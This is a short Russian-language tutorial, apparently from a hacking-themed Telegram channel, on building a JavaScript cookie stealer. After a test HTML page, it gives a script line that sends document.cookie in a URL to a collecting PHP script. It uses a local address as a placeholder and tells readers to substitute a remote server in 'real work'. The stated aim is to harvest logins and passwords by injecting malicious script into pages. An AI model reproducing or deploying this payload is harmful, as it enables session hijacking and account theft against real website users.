Делаем Cookie-стиллер

Делаем Cookie-стиллер

INHIDE
Быстро подписался, если хакером назвался!

JavaScript – один из самых распространенных языков, используемых в веб-программировании. Он скрывает в себе множество полезных возможностей для работы с сайтами, хотя некоторые их них не столь однозначны (например, сборщик куки, который мы будем использовать в этой статье).

Куки (cookies) – данные, запрашиваемые веб-сайтом в целях “запоминания” пользователя. Содержат в себе: время посещения сайта, устройство подключения, логины, пароли и прочую деликатную информацию – чтобы их заполучить, мы попробуем заразить исходный html-код страницы вредоносным javascript.


#Создание тестовой HTML страницы

Для начала, создадим новую директорию, где будет ютиться наш html-файл:

mkdir cookiestealer





И переместимся в неё командой

cd cookiestealer





Оказавшись в директории, создадим файл "index.html" командой

touch index.html





Далее займемся его наполнением

nano index.html





Добавьте стандартные html-теги в документ:

<html> 
      <body> 
      </body> 
</html>





Получится что-то вроде этого

Теперь сохраняйте документ сочетанием клавиш Ctrl+O. Если мы откроем этот файл в нашем браузере, увидим пустую страницу (это логично).



#Создание cookies

Мы можем самостоятельно создать cookies добавив одну лишь строчку в нашу тестовую html-страницу:

<script type="text/javascript"> 
    document.cookie = "username=Null Byte"; 
</script>





В редакторе впишите эту строку между тегами “body” как указано на скриншоте:

Если Вы откроете веб-страницу еще раз после сохранения, внешне ничего не изменится, но “под капотом” уже появились наши cookies. Чтобы их посмотреть добавим в наш javascript команду вывода:

document.write(document.cookie);





Наш скрипт теперь выглядит вот так:

Еще раз сохраните и откройте через браузер – теперь Вы видите наши самодельные cookies.

Не забудьте потом стереть команду “document.write(document.cookie);” из файла – мы же не хотим показывать cookie в дальнейшем.


#Воруем cookies при помощи JavaScript

Используя JavaScript, перенаправим вывод куки на сервер для дальнейшего использования командой:

document.location='http://127.0.0.1 /cookiestealer.php?c='+document.cookie;





В примере я использую локальный адрес 127.0.0.1 – в настоящей работе Вы должны использовать адрес файла, расположенного на удаленном сервере.

Теперь Ваш html-файл должен выглядеть примерно вот так:

Этого вполне достаточно, чтобы перенаправить cookies в необходимое нам место.




Report content on this page

Report Page

Please submit your DMCA takedown request to dmca@telegram.org